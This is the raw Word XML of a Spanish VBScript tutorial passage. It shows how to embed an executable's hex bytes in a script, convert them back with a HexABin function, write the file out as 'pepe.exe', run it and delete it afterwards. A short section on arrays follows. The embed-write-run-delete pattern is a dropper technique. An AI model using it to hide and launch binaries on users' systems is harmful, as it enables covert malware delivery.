        <w:t xml:space="preserve"> para crearlos a placer y con la comodidad de las funciones de VBScript. Esto es útil,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para crear ejecutables en modo texto y luego ejecutarlos, porque a veces es más cómodo usar un vbs para algo, que un exe... La utilidad, solo depende de tu imaginación y tus capacidades de programador, y las posibilidades también, yo me limitaré a explicar como se hace esto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="266"/>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Entremos en materi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Habéis visto alguna vez un editor hexadecimal? Para los que no, pueden ir a Google, buscarlo, bajarse uno y probarlo, pues lo necesitaran para poder hacer esto. Bien, explicare un poco por encima que es un Editor Hexadecimal. Supongo que ya sabréis que en el mundo de la informática todo se rige por bits (1 y 0). Si por ejemplo tenemos un exe, lo que se ejecuta realmente es una cadena enorme de 1 y 0 (en forma de impulsos electricos), que son interpretados por el SO y por el Procesador, y dan como resultado, una serie de instrucciones que conforman un programa. Cuando los programas se empezaron a hacer tan largos que los programadores ya no podían escribirlos a base de esto, se inventaron los lenguajes de programación (ASM, C, VB...). Un paso intermedio entre esto, fue el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">hexadecimal </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(Que utiliza los símbolos 0-9 y A-F). Que no es más que otro sistema numérico para expresar lo mismo que en binario. Un ejemplo rápido para que os hagáis una ide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binario: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>01101010</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> En nuestro sistema: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>106</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> En hexadecimal: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>6A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>
        <w:ind w:left="71" w:right="31"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Bien, esto como cultura general. Lo que realmente nos importa es: los Editores Hexadecimales</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifican un ejecutable mediante el sistema Hexadecimal.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Es decir, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>leen el archivo, traducen el código a hexadecimal, lo muestran, traducen el hexadecimal a código maquina y lo escriben</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Bien, pues nosotros haremos lo mismo. (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Nota para vagos: No os preocupéis el código es muy corto.</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Si en un momento determinado, en un Script necesitamos que se haga algo que el motor de comandos de VBScript no puede (crear una ventana de opciones, mostrar un mensaje </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">guay </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ejecutar el famoso hlt, mostrar una imagen, reproducir música...), podemos escribir un exe más o menos así:</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gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Parte del principio del Script</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Variable con el código hexadecimal de un Exe</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Traductor a código maquina</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Objeto fso que crea el archivo</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Objeto ws que ejecuta el archivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="93" w:right="111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gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ejecuta nuestro programa </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Bucle que mantiene el Script abierto.</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tatus de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Exec</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica que se ha cerrado nuestro programa.</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Fin del Bucle si se cumple lo anterior.</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Objeto fso que borra el archiv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gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resto del Scrip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unque no lo parezca, no es tan largo ni complicado, y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>apenas tarda dos segundos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en ejecutarse. Una vez lo tengamos todo decidido (programa a usar y objetivos...), empezamos a programar el Script, que ahora explicaré con detenimient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Necesitamos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en una variable, el código en hexadecimal de un Exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esto lo obtendremos con el Editor Hexadecimal.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en el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Hackman,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> seleccionamos todo el código, vamos a Edición, Copiar como, Hex. Luego vamos al bloc de notas y pegamos. Cogemos y quitamos el texto de publicidad del principio y todo lo que pone 0000:0001... (Es decir el principio de cada línea). Luego ponemos todo el código en una línea muy larga. Finalmente vamos al menú, reemplazar, ponemos buscar un espacio " " y lo sustituimos por nada "". </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Así se nos quedara el código hexadecimal limpio del archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(es decir, todo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>números y letras de la A a la F en una línea, sin ningún espacio, punto ni nada</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">). Luego solo colocarle al principio </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Var1 </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>= " y al final otras comillas. (S</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>i el código es muy largo partir el código en varias variables y a la hora de escribirlo ponéis Var1&amp;Var2&amp;Var3 o algo así</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hora ya tenemos el ejecutable en hexadecimal dentro del Script, pero la verdad, con eso no haremos nada. Necesitamos una funcion que llegado el momento la vuelva a pasar de hexadecimal (hex ascii) </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>al codigo maquina (hex real...), al igual que hacen los Editores Hexadecimales:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="13"/>
        <w:ind w:left="71" w:right="4772"/>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Function </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HexABin</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(hexadecimal) For i = 1 To Len(hexadecimal) Step 2</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tb = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Chr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>37+1) &amp; Chr(72) &amp; Mid(hexadecimal, i, 2): tt = tt &amp; Chr(tb)</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Next</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HexABin = tt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="266"/>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End Function</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No me acuerdo de donde la saque, pero bueno... La cuestión es que debemos incluir esta función en alguna parte de nuestro código, para que a la hora de escribir el archivo no lo escriba en hexadecimal, sino en código maquina (podéis quejaros los expertos, pero lo que hemos hecho a sido obtener en modo Ascii el hexadecimal, o lo que es lo mismo, que hay que pasarlo a hexadecimal real...) Bien, ahora vamos a ir a lo que ya sabemos, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>escribir y controlar la aplicación</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Al escribirlo debemos hacerlo en modo binario, así que:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>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 xml:space="preserve">Set fso = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"Scripting.FileSystemObject")</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Set Archivo = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.CreateTextFile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pepe.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>
        <w:ind w:left="93" w:right="1276"/>
        <w:jc w:val="left"/>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Archivo.Write </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HexABin</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>VarConLaCadenaEnHexadecimal</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) Archivo.Clos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Recordad que se debe escribir lo que la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">HexABin </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>devuelve, y no el hexadecimal que hemos escrito nosotros en la variable. Por ultimo bastara con que ejecutéis el programa que se ha escrito y lo controleis tal y como se explica en el tutorial anterior... Simple y Eficaz.</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es que, con imaginación se puede hacer todo. De todo este script, lo más costoso, sin duda, es conseguir todo el código hexadecimal de un archivo, pero si buscáis e indagáis por vuestra cuenta, encontrareis métodos rapidísimos para obtenerlo. Lo demás, es sencillo y creo que no requiere mayor explicación. Además, si lo piensas bien, existen maneras de que un exe y un script se comuniquen (escribir en un archivo uno, y el otro lo lee...), por lo que aumenta sus posibilidades, si eres programador.</w:t>
      </w:r>
    </w:p>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Es cierto que lo normal seria compilar el script y no incluir un exe en el script, pero siempre es bueno saberlo, quizás puede ser útil...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="40"/>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Array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xiste un tipo de variable especial en Visual Basic Script llamada comúnmente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Los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> más sencillos son estructuras de variables; esto es, un bloque de x variables, unidas todas en una. Veamos un ejemplo para explicarlo sobre la marcha:</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Option Explici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im </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Variable(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3)</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n esto hemos creado un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que contiene cuatro variables en un sentido. Podemos visualizarlo claramente con el esquema siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2660"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2114550" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10630" name="Picture 10630"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="10630" name="Picture 10630"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2114550" cy="74295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hemos creado un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o Matriz Fila), de cuatro elementos (el 0,1,2 y 3). Para dar y recibir valores del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es tan simple como indicar </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cual de las posiciones del Array</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> recibirá u otorgará el valor:</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0) = 6</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1) = 3</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2) = Variable(0)/Variable(1)</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3) = “El resultado es “ &amp; Variable(2)</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en este ejemplo entregamos a la posición 0 del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Variable el numero 6, a la posición 1 el numero 3, a la posición 2 la división 6/2, y a la posición 3 el texto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El resultado es 6</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Como seguramente ya habréis deducido, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">lo que hay entre los paréntesis </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">que acompaña a Variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>indica la posición del</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elegida; y que cada posición </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se comporta como</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i de una variable normal se tratase</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
